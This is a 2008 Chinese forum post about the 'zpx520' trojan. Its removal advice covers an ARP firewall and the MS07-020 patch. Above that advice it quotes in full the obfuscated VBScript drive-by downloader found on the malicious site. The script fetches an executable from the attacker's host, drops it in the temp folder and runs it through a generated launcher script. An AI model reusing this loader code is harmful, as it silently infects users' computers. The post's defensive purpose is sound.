设为首页收藏本站

 找回密码
 注册账户
网络实验室»论坛 ≡ CnLabs 资源区 ≡ 软件资源共享 zpx520木马解决方案及专杀工具下载
返回列表 发新帖
查看: 877|回复: 0

zpx520木马解决方案及专杀工具下载

[复制链接]
admin 发表于 2008-4-14 01:11:20 | 显示全部楼层 |阅读模式



<BR><SPAN class=bold>zpx520 病毒</SPAN><BR><BR>
<DIV class=t_msgfont id=message707087>zpx520 病毒<BR>在我的流览器中,打开163.com等很多网站查看网页源码都出现这一行。应该是本地劫持放到浏览器中的。Do you Qihoo?rame src ='http://www. zpx520.com/0 .htm' width=0 height=0 &gt; &lt;/i-frame -X&gt;<BR><BR>用卡巴查杀清除不了,最后全盘格式化了上网也是如此,用木马查杀没有发现什么,安全卫士也没发现问题。查看了<A href="http://q.zpx520.com/1.htm" target=_blank><U><FONT color=#0000ff>http ://q.zpx520.com/1. htm</FONT></U></A>网站的源码,如下:<BR><BR>&lt;SCRIPT language=VBS&gt;<BR>'1&nbsp; xiaohui 's Script<BR>'2 update 2007.2.24<BR>'1<BR>ps="Be gin game ^O^"<BR>'1 <BR>On Error Resume Next<BR>'1<BR>https="htt"&amp;"p://"&amp;"w .zpx520.com/0 .exe"&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;<BR>'1&nbsp; <BR>pso= "ob"&amp;"je"&amp;"ct"<BR>'1<BR>Set Pj=document.createElement(pso)<BR>'1<BR>Pj.SetAttribute "class"+"id", "&nbsp; clsid"&amp;":BD96"&amp;"C556"&amp;"-65A3-11D0-98"&amp;"3A-00C04"&amp;"FC29E36"<BR>'1<BR>Set PS1=Pj.CreateObject("Mic"&amp;"ros"&amp;&nbsp; "oft."&amp;"XML"&amp;"HT"&amp;"TP","")<BR>'1<BR>PS1.Open "G"&amp;"ET", https, False<BR>'1<BR>PS1.Send<BR>'1<BR>ExeName="commomd.pif"<BR>'1<BR>VbsName="run.vbs"<BR>'1<BR>Set PS2=Pj.createobject("Scri"&amp;"p"&amp;"ting.F&nbsp; "&amp;"i"&amp;"le"&amp;"Sy"&amp;"st"&amp;"e"&amp;"mO"&amp;"bje"&amp;"ct","")<BR>'1<BR>Set PS3=PS2.GetSpecialFolder(2)<BR>'1<BR>ExeName=PS2.BuildPath(PS3,ExeName)<BR>'1<BR>VbsName=PS2.BuildPath(PS3,VbsName)<BR>'1<BR>AA="A"&amp;"d"<BR>'1<BR>BB="o"&amp;"d"&amp;"b"&amp;"."&amp;"s"&amp;"tre"&amp;"am"<BR>'1<BR>DC=AA&amp;BB<BR>'1<BR>Set XBOX=Pj.createobject(DC,"")<BR>'1<BR>XBOX.type=1<BR>'1<BR>XBOX.Open<BR>'1<BR>XBOX.Write PS1.ResponseBody<BR>'1<BR>XBOX.Savetofile ExeName,2<BR>'1<BR>XBOX.Close<BR>'1<BR>XBOX.Type=2<BR>'1<BR>XBOX.Open<BR>'1<BR>XBOX.WriteText "Set ws=CreateObject(""Wscript.Shell"")"&amp;vbCrLf&amp;"ws.Run &nbsp;("""&amp;ExeName&amp;""")"&amp;vbCrLf&amp;"Set ws=Nothing"<BR>'1<BR>XBOX.Savetofile VbsName,2<BR>'1<BR>XBOX.Close<BR>'1<BR>GBA="S"&amp;"h"&amp;"e"&amp;"l"&amp;"l"&amp;"."&amp;"A "&amp;"p"&amp;"p"&amp;"l"&amp;"i"<BR>'1<BR>Set Run=Pj.createobject (GBA&amp;"cation","")<BR>'2<BR>Run.ShellExecute VbsName&nbsp; ,"","","Open",0<BR>'3<BR>ps=" The end ^O^"<BR>&nbsp;&lt;/SCRIPT&gt;<BR><BR>发现了这行,htt"&amp;"p://"&amp;"w .zpx520 .com/0 .exe</DIV>
<DIV class=t_msgfont>&nbsp;</DIV>
<DIV class=t_msgfont>&nbsp;</DIV>
<DIV class=t_msgfont><FONT color=#ff0033 size=3><STRONG>zpx520木马解决方案及专杀工具下载</STRONG></FONT></DIV>
<DIV class=t_msgfont><STRONG><FONT color=#ff0033 size=3></FONT></STRONG>&nbsp;</DIV>
<DIV class=t_msgfont>&nbsp;首先这个木马我所知道的现在瑞星和卡吧可以查杀,但是杀毒软件是针对你的站点的URL的,不同的URL就会再次跳出警告,这显然很烦。现在说说我的解决方案。<BR><BR>&nbsp;&nbsp;首先去<A href="http://www.antiarp.com/" target=_blank><U><FONT color=#0000ff>下载一个ARP防火墙</FONT></U></A>,这个光标病毒的幕后是ARP攻击。在你的网络里有一台机器被挟持作为攻击服务器了,并且伪装为路由IP。通过ARP防火墙可以找到这台机器,并且把这台机器搞定(第一就是拔了他的网线)。然后升级杀毒软件(我用的卡吧)、打上<A href="http://www.microsoft.com/china/technet/security/bulletin/MS07-020.mspx" target=_blank><U><FONT color=#0000ff>Window的系统补丁</FONT></U></A>(KB932168)。 </DIV>
<DIV class=t_msgfont><A href="http://www.antiarp.com/" target=_blank><U><FONT color=#0000ff>下载一个ARP防火墙</FONT></U></A>下载地址:<A href="http://www.antiarp.com/"><FONT color=#0033ff>http://www.antiarp.com/</FONT></A></DIV>
<DIV class=t_msgfont><A href="http://www.microsoft.com/china/technet/security/bulletin/MS07-020.mspx" target=_blank><U><FONT color=#0000ff>Window的系统补丁</FONT></U></A>下载地址: <A href="http://www.microsoft.com/china/technet/security/bulletin/MS07-020.mspx"><FONT color=#0000ff>http://www.microsoft.com/china/technet/security/bulletin/MS07-020.mspx</FONT></A></DIV> <BR>

卡巴, 安全卫士, 方案, 木马, 浏览器

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册账户

本版积分规则

存档|黑屋|手机|网络实验室 本站服务器由美国合租以及IDCLayer国际数据提供!!!

GMT+8, 2026-6-13 18:42 , Processed in 0.010818 second(s), 7 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表